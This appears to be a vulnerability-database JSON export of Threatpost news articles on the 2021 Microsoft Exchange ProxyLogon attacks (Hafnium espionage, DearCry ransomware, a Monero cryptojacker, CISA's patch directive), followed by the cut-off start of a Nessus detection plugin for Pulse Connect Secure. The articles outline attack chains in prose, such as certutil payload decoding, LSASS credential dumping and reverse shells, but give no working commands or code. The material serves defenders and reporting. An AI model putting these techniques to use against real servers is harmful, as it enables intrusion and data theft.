[pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)\n> \n> \u2014 ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)\n\nThe vulnerabilities only exist in on-premise versions of Exchange Server, and don\u2019t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.\n\n\u201cWith organizations migrating to Microsoft Office 365 en masse over the last few years, it\u2019s easy to forget that on-premises Exchange servers are still in service,\u201d Saryu Nayyar, CEO, Gurucul, said via email. \u201cSome organizations, notably in government, can\u2019t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.\u201d\n\n## **CISA Mandates Patching Exchange Servers**\n\nCISA is requiring federal agencies to take several steps in light of the spreading attacks.\n\nFirst, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.\n\nThe forensics step would include collecting \u201csystem memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.\u201d\n\nIf no indicators of compromise have been found, agencies must immediately patch, CISA added. And if agencies can\u2019t immediately patch, then they must take their Microsoft Exchange Servers offline.\n\nAll agencies have also been told to submit an initial report by Friday on their current situation.\n\n\u201c[This] highlights the increasing frequency of attacks orchestrated by nation states,\u201d said Steve Forbes, government cybersecurity expert at Nominet, via email. \u201cThe increasing role of government agencies in leading a coordinated response against attacks. CISA\u2019s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.\u201d\n", "cvss3": {}, "published": "2021-03-04T17:08:36", "type": "threatpost", "title": "CISA Orders Fed Agencies to Patch Exchange Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:08:36", "id": "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "href": "https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-15T12:28:24", "description": "Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.\n\nResearchers discovered the threat actors using Exchange servers compromised using the highly publicized exploit chain\u2014which suffered a [barrage of attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells\u2014to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.\n\n\u201cAn unknown attacker has been attempting to leverage what\u2019s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,\u201d Sophos principal researcher Andrew Brandt wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers were inspecting telemetry when they discovered what they deemed an \u201cunusual attack\u201d targeting the customer\u2019s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.\n\nResearchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they\u2019ve been attacked in this way.\n\n## **How It Works**\n\nThe attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server\u2019s Outlook Web Access logon path (/owa/auth), according to the report. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.\n\nThe first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.\n\nThe batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.\n\nThe executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its Github page as having the ability to \u201cmigrate any x64 exe to any x64 process\u201d with \u201cno administrator privileges required,\u201d according to the report.\n\nOnce the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. \u201cThe batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,\u201d Brandt wrote.\n\nResearchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.\n\n## **Exploit-Chain History**\n\nThe ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).\n\nTogether the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAs previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-15T12:19:13", "type": "threatpost", "title": "Attackers Target ProxyLogon Exploit to Install Cryptojacker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-15T12:19:13", "id": "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "href": "https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) release leads us to believe the flaws are quite severe even if we don\u2019t know the full scope of those attacks,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nMicrosoft patched following bugs this week, and admins should update accordingly:\n\n * **CVE-2021-26855** is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.\n * **CVE-2021-26857** is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.\n * **CVE-2021-26858** and **CVE-2021-27065** are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server \u2013 thus achieving remote code execution (RCE).\n\nResearchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, \u201cThis vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.\u201d\n\nThey also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.\n\nIn addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.\n\n\u201cBased on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user\u2019s mailbox,\u201d said Tenable\u2019s Narang. \u201cThe other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization\u2019s network.\u201d\n\n## **What Happened in the Hafnium Attacks?**\n\nIn the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.\n\n\u201cIn all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,\u201d according to [Volexity\u2019s writeup](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>).\n\nFollowing web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory;\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration;\n * Adding and using Exchange PowerShell snap-ins to export mailbox data;\n * Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;\n * And downloading PowerCat from GitHub, then using it to open a connection to a remote server.\n\nThe attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.\n\n\u201cThe good news for defenders is that the post-exploitation activity is very detectable,\u201d said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. \u201cSome of the activity we observed uses [the China Chopper web shell](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), which has been around for more than eight years, giving defenders ample time to develop detection logic for it.\u201d\n\n## **Who is the Hafnium APT?**\n\nHafnium has been tracked by Microsoft before, but the company has [only just released a few details](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) on the APT.\n\nIn terms of its tactics, \u201cHafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,\u201d according to Microsoft. \u201cOnce they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.\u201d\n\nHafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. It characterizes the APT as \u201ca highly skilled and sophisticated actor.\u201d\n\n## **Time to Patch: Expect More Attacks Soon**\n\nIt should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.\n\n\u201cWe expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,\u201d he added.\n\nAnd indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection/recovery installed) and expect this number to keep rising.\n\nThey\u2019re not alone.\n\n\u201cFireEye has observed these vulnerabilities being exploited in the wild and we are actively working with several impacted organizations,\u201d Charles Carmakal, senior vice president and CTO at FireEye Mandiant, said via email. \u201cIn addition to patching as soon as possible, we recommend organizations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.\u201d\n", "cvss3": {}, "published": "2021-03-03T15:30:52", "type": "threatpost", "title": "Microsoft Exchange 0-Day Attackers Spy on U.S. Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T15:30:52", "id": "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "href": "https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-16T14:17:03", "description": "Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.\n\nThe ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft [issued emergency patches in early March](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) for four Microsoft Exchange flaws. The flaws [can be chained together](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>) to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials.\n\nThe flaws give attackers the opportunity to install a webshell for further exploitation within the environment \u2014 and now, researchers say attackers are downloading the new ransomware strain (a.k.a. Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,\u201d Microsoft said [on Twitter](<https://twitter.com/MsftSecIntel/status/1370236539427459076>), Thursday.\n\n## **DearCry Ransomware**\n\nDearCry first came onto the infosec space\u2019s radar after ransomware expert Michael Gillespie [on Thursday said he observed](<https://twitter.com/demonslay335/status/1370125343571509250>) a \u201csudden swarm\u201d of submissions to his ransomware identification website, ID-Ransomware.\n\nThe ransomware uses the extension \u201c.CRYPT\u201d when encrypting files, as well as a filemarker \u201cDEARCRY!\u201d in the string for each encrypted file.\n\n[Microsoft later confirmed](<https://twitter.com/phillip_misner/status/1370197696280027136>) that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nhttps://twitter.com/demonslay335/status/1370125343571509250\n\nAccording to a [report by BleepingComputer](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/amp/>), the ransomware drops a ransom note (called \u2018readme.txt\u2019) after initially infecting the victim \u2013 which contains two email addresses for the threat actors and demands a ransom payment of $16,000.\n\nMeanwhile, [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1370130753586102272>) on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. On Twitter, MalwareHunterTeam said the ransomware is \u201cnot that very widespread (yet?).\u201d Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which [can be found here)](<https://twitter.com/malwrhunterteam/status/1370271414855593986>).\n\n## **Microsoft Exchange Attacks Doubling Every Hour**\n\nExploitation activity for the recently patched Exchange flaws continue to skyrocket, [with researchers this week warning](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.\n\n[New research by Check Point Software](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) said in the past 24 hours alone, the number of exploitation attempts on organizations have doubled every two to three hours.\n\nResearchers said they saw hundreds of exploit attempts against organizations worldwide \u2013 with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).\n\nResearchers warned that exploitation activity will continue \u2014 and urged companies that have not already done so to patch.\n\n\u201cSince the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,\u201d according to Check Point researchers. \u201cGlobal experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-12T16:26:07", "type": "threatpost", "title": "Microsoft Exchange Exploits Pave a Ransomware Path", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-12T16:26:07", "id": "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "href": "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n\u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APT) and possibly other adversaries moving quickly to exploit the bug. A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n\n\nClick to enlarge. Source: CyberNews.\n\nVictor Wieczorek, practice director for Threat &amp; Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. \u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. \u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. \u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. potential litigation because sensitive data was stolen from the network.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:02:12", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is greater than 9.0R3 and prior to 9.1R11.4. It is, therefore, affected by multiple vulnerabilities including an authentication bypass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-04-20T00:00:00", "type": "nessus", "title": "Pulse Connect Secure < 9.1R11.4 (SA44784)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "modified": "2021-06-23T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-SA44784.NASL", "href": "https://www.tenable.com/plugins/nessus/148847", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148847);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/23\");\n\n script_cve_id(\n \"CVE-2021-22893\",\n \"CVE-2021-22894\",\n \"CVE-2021-22899\",\n \"CVE-2021-22900\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0207-S\");\n\n script_name(english:\"Pulse Connect Secure < 9.1R11.4 (SA44784)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is greater than\n9.0R3 and prior to 9.1R11.4. It is, therefore, affected by multiple vulnerabilities including an authentication bypass\nvulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect\nSecure gateway.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Connect Secure version 9.1R11.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22894\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n 